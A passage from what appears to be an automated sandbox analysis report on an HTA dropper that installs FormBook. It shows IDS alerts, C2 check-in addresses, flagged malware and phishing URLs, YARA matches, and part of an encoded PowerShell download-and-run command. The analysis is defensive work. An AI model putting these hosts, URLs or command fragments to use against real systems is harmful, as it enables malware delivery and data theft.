ICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", ProcessId: 8064, ProcessName: csc.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-15T17:19:39.950913+020020220501A Network Trojan was detected172.245.208.2180192.168.2.449721TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-15T17:19:40.227758+020020220511A Network Trojan was detected172.245.208.2180192.168.2.449721TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-15T17:20:29.080987+020028554651A Network Trojan was detected192.168.2.449723168.76.121.21080TCP
                  2025-04-15T17:20:52.607697+020028554651A Network Trojan was detected192.168.2.449728173.255.194.13480TCP
                  2025-04-15T17:21:16.474432+020028554651A Network Trojan was detected192.168.2.44973213.248.169.4880TCP
                  2025-04-15T17:21:31.473477+020028554651A Network Trojan was detected192.168.2.449736103.105.23.22280TCP
                  2025-04-15T17:21:47.288074+020028554651A Network Trojan was detected192.168.2.449740156.237.132.25280TCP
                  2025-04-15T17:22:01.319514+020028554651A Network Trojan was detected192.168.2.449744159.198.64.7280TCP
                  2025-04-15T17:22:15.091476+020028554651A Network Trojan was detected192.168.2.449748104.21.96.180TCP
                  2025-04-15T17:22:36.798917+020028554651A Network Trojan was detected192.168.2.449752199.59.243.16080TCP
                  2025-04-15T17:22:51.397675+020028554651A Network Trojan was detected192.168.2.44975613.248.169.4880TCP
                  2025-04-15T17:23:05.959781+020028554651A Network Trojan was detected192.168.2.44976045.130.41.11380TCP
                  2025-04-15T17:23:21.466559+020028554651A Network Trojan was detected192.168.2.44976418.139.62.22680TCP
                  2025-04-15T17:23:35.251142+020028554651A Network Trojan was detected192.168.2.449768172.67.217.18480TCP
                  2025-04-15T17:23:53.000995+020028554651A Network Trojan was detected192.168.2.44977213.248.169.4880TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-15T17:20:44.601552+020028554641A Network Trojan was detected192.168.2.449725173.255.194.13480TCP
                  2025-04-15T17:20:47.273775+020028554641A Network Trojan was detected192.168.2.449726173.255.194.13480TCP
                  2025-04-15T17:20:49.939547+020028554641A Network Trojan was detected192.168.2.449727173.255.194.13480TCP
                  2025-04-15T17:21:07.461688+020028554641A Network Trojan was detected192.168.2.44972913.248.169.4880TCP
                  2025-04-15T17:21:11.136466+020028554641A Network Trojan was detected192.168.2.44973013.248.169.4880TCP
                  2025-04-15T17:21:13.809200+020028554641A Network Trojan was detected192.168.2.44973113.248.169.4880TCP
                  2025-04-15T17:21:22.901273+020028554641A Network Trojan was detected192.168.2.449733103.105.23.22280TCP
                  2025-04-15T17:21:25.766056+020028554641A Network Trojan was detected192.168.2.449734103.105.23.22280TCP
                  2025-04-15T17:21:28.614161+020028554641A Network Trojan was detected192.168.2.449735103.105.23.22280TCP
                  2025-04-15T17:21:38.685744+020028554641A Network Trojan was detected192.168.2.449737156.237.132.25280TCP
                  2025-04-15T17:21:41.542837+020028554641A Network Trojan was detected192.168.2.449738156.237.132.25280TCP
                  2025-04-15T17:21:44.440969+020028554641A Network Trojan was detected192.168.2.449739156.237.132.25280TCP
                  2025-04-15T17:21:52.908309+020028554641A Network Trojan was detected192.168.2.449741159.198.64.7280TCP
                  2025-04-15T17:21:55.784174+020028554641A Network Trojan was detected192.168.2.449742159.198.64.7280TCP
                  2025-04-15T17:21:58.561192+020028554641A Network Trojan was detected192.168.2.449743159.198.64.7280TCP
                  2025-04-15T17:22:07.061025+020028554641A Network Trojan was detected192.168.2.449745104.21.96.180TCP
                  2025-04-15T17:22:09.697420+020028554641A Network Trojan was detected192.168.2.449746104.21.96.180TCP
                  2025-04-15T17:22:12.382549+020028554641A Network Trojan was detected192.168.2.449747104.21.96.180TCP
                  2025-04-15T17:22:28.800984+020028554641A Network Trojan was detected192.168.2.449749199.59.243.16080TCP
                  2025-04-15T17:22:31.455832+020028554641A Network Trojan was detected192.168.2.449750199.59.243.16080TCP
                  2025-04-15T17:22:34.151778+020028554641A Network Trojan was detected192.168.2.449751199.59.243.16080TCP
                  2025-04-15T17:22:42.384012+020028554641A Network Trojan was detected192.168.2.44975313.248.169.4880TCP
                  2025-04-15T17:22:45.052134+020028554641A Network Trojan was detected192.168.2.44975413.248.169.4880TCP
                  2025-04-15T17:22:47.719965+020028554641A Network Trojan was detected192.168.2.44975513.248.169.4880TCP
                  2025-04-15T17:22:58.133769+020028554641A Network Trojan was detected192.168.2.44975745.130.41.11380TCP
                  2025-04-15T17:23:00.399159+020028554641A Network Trojan was detected192.168.2.44975845.130.41.11380TCP
                  2025-04-15T17:23:03.183470+020028554641A Network Trojan was detected192.168.2.44975945.130.41.11380TCP
                  2025-04-15T17:23:12.945399+020028554641A Network Trojan was detected192.168.2.44976118.139.62.22680TCP
                  2025-04-15T17:23:15.730176+020028554641A Network Trojan was detected192.168.2.44976218.139.62.22680TCP
                  2025-04-15T17:23:18.595414+020028554641A Network Trojan was detected192.168.2.44976318.139.62.22680TCP
                  2025-04-15T17:23:27.232281+020028554641A Network Trojan was detected192.168.2.449765172.67.217.18480TCP
                  2025-04-15T17:23:29.880358+020028554641A Network Trojan was detected192.168.2.449766172.67.217.18480TCP
                  2025-04-15T17:23:32.562621+020028554641A Network Trojan was detected192.168.2.449767172.67.217.18480TCP
                  2025-04-15T17:23:41.967467+020028554641A Network Trojan was detected192.168.2.44976913.248.169.4880TCP
                  2025-04-15T17:23:45.649381+020028554641A Network Trojan was detected192.168.2.44977013.248.169.4880TCP
                  2025-04-15T17:23:49.323988+020028554641A Network Trojan was detected192.168.2.44977113.248.169.4880TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://www.anyang-590303492.click/6npl/?UV90oJV=/JYiv5NhO0tELAK8hKXRL6yPw09VuQMvi5BuLmngF2OWbpzZErtHeLuo5nDg79GzI2QTdod40q0r+J2P58yW7/6plb4OcALkiS6guO79bLlT8DxgdN065to=&LVsla=JHrxl4tAvira URL Cloud: Label: malware
                  Source: http://www.worrr37.yachts/1imc/?UV90oJV=GkZ+7lZN5ZbT6rZArZ+XuW2LS/GQFqiR2eAXidPe90Y9rybDHdv8GRqVb6FfMfkpXSVDgNv2zaXT/X0CpEMHyOeTTSnvzCMVpGnq9juhbcH3k1fZ/Ho823c=&LVsla=JHrxl4tAvira URL Cloud: Label: phishing
                  Source: http://www.soportemx-findmy.click/ma0g/Avira URL Cloud: Label: phishing
                  Source: http://www.play-venom-rush.xyzAvira URL Cloud: Label: malware
                  Source: http://www.play-venom-rush.xyz/pji1/?LVsla=JHrxl4t&UV90oJV=oPSxN0d9Y70P2riykwj378jDK4dA5CWov285JwcUKQzMmNdemng31QxGRPhWi1n81NmvKhZ2Lkv1YeaEtRyFRChPj4DjhNDfDC0AWPeNp3jL6YRDWHxMF/w=Avira URL Cloud: Label: malware
                  Source: http://www.soportemx-findmy.click/ma0g?gp=1&js=1&uuid=1744730452.0012257657&other_args=eyJ1cmkiOiAiLAvira URL Cloud: Label: phishing
                  Source: http://www.play-venom-rush.xyz/pji1/Avira URL Cloud: Label: malware
                  Source: http://www.soportemx-findmy.click/ma0g/?LVsla=JHrxl4t&UV90oJV=H2S90RmziCMvLCuK8yTaL3f2umhuNHnT+UjWuF5QkK5TSoHa4lhKP7xjBIvwYHsxlglzK0GWG6GIcHietPpqxtVwo9BPmEy9xm5LwWe49kMrhYdXnmUTf+U=Avira URL Cloud: Label: phishing
                  Source: http://www.anyang-590303492.click/6npl/Avira URL Cloud: Label: malware
                  Source: http://www70.soportemx-findmy.click/Avira URL Cloud: Label: phishing
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\igcc[1].exeReversingLabs: Detection: 41%
                  Source: C:\Users\user\AppData\Roaming\igcc.exeReversingLabs: Detection: 41%
                  Multi AV Scanner detection for submitted file
                  Source: njo.htaVirustotal: Detection: 40%Perma Link
                  Source: njo.htaReversingLabs: Detection: 27%
                  Yara detected FormBook
                  Source: Yara matchFile source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3664383512.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1611189571.00000000047A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3666208376.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleNeural Call Log Analysis: 99.4%
                  Source: Binary string: ATBroker.pdb source: svchost.exe, 0000000D.00000003.1576499115.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1576388151.000000000341B000.00000004.00000020.00020000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000003.1681787984.0000000000548000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: igcc.exe, 0000000C.00000003.1362520045.0000000004020000.00000004.00001000.00020000.00000000.sdmp, igcc.exe, 0000000C.00000003.1360820679.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1507905161.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1509975834.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.00000000052CE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1612443700.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1609657209.0000000004DD2000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.0000000005130000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: igcc.exe, 0000000C.00000003.1362520045.0000000004020000.00000004.00001000.00020000.00000000.sdmp, igcc.exe, 0000000C.00000003.1360820679.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000D.00000002.1610420128.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1507905161.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1509975834.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.00000000052CE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1612443700.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1609657209.0000000004DD2000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.0000000005130000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: q7C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.pdb source: powershell.exe, 00000003.00000002.1374616824.0000000004991000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 0000000D.00000003.1576499115.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1576388151.000000000341B000.00000004.00000020.00020000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000003.1681787984.0000000000548000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WRNKS5Hlc0y.exe, 0000000F.00000002.3664843128.000000000062F000.00000002.00000001.01000000.0000000A.sdmp
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007445A GetFileAttributesW,FindFirstFileW,FindClose,12_2_0007445A
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007C6D1 FindFirstFileW,FindClose,12_2_0007C6D1
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_0007C75C
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0007EF95
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0007F0F2
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0007F3F3
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000737EF
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00073B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00073B12
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0007BCBC
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 4x nop then pop edi15_2_06A3CCBD
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 4x nop then xor eax, eax15_2_06A424FB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 4x nop then pop edi15_2_06A4DAB8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 172.245.208.21:80 -> 192.168.2.4:49721
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49723 -> 168.76.121.210:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49726 -> 173.255.194.134:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49734 -> 103.105.23.222:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49730 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 159.198.64.72:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49725 -> 173.255.194.134:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 103.105.23.222:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49733 -> 103.105.23.222:80
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 172.245.208.21:80 -> 192.168.2.4:49721
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 156.237.132.252:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 156.237.132.252:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49731 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 104.21.96.1:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49728 -> 173.255.194.134:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49748 -> 104.21.96.1:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49764 -> 18.139.62.226:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 18.139.62.226:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 172.67.217.184:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49760 -> 45.130.41.113:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 45.130.41.113:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 104.21.96.1:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 18.139.62.226:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 159.198.64.72:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 156.237.132.252:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 159.198.64.72:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49744 -> 159.198.64.72:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49732 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 104.21.96.1:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49727 -> 173.255.194.134:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 18.139.62.226:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49752 -> 199.59.243.160:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 172.67.217.184:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49740 -> 156.237.132.252:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49756 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49729 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 45.130.41.113:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49768 -> 172.67.217.184:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 199.59.243.160:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 199.59.243.160:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49735 -> 103.105.23.222:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 199.59.243.160:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49772 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 172.67.217.184:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 45.130.41.113:80
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: www.vczuahand.xyz
                  Source: DNS query: www.855696a.xyz
                  Source: DNS query: www.play-venom-rush.xyz
                  Source: DNS query: www.jicode.xyz
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Apr 2025 15:19:39 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 15 Apr 2025 05:37:48 GMTETag: "122c00-632ca91a2bb10"Accept-Ranges: bytesContent-Length: 1190912Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 99 f0 fd 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 4a 09 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 12 00 00 04 00 00 23 7b 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 14 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 12 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 a3 05 00 00 70 0c 00 00 a4 05 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 20 12 00 00 72 00 00 00 ba 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: Joe Sandbox ViewIP Address: 172.245.208.21 172.245.208.21
                  Source: Joe Sandbox ViewIP Address: 172.67.217.184 172.67.217.184
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.21
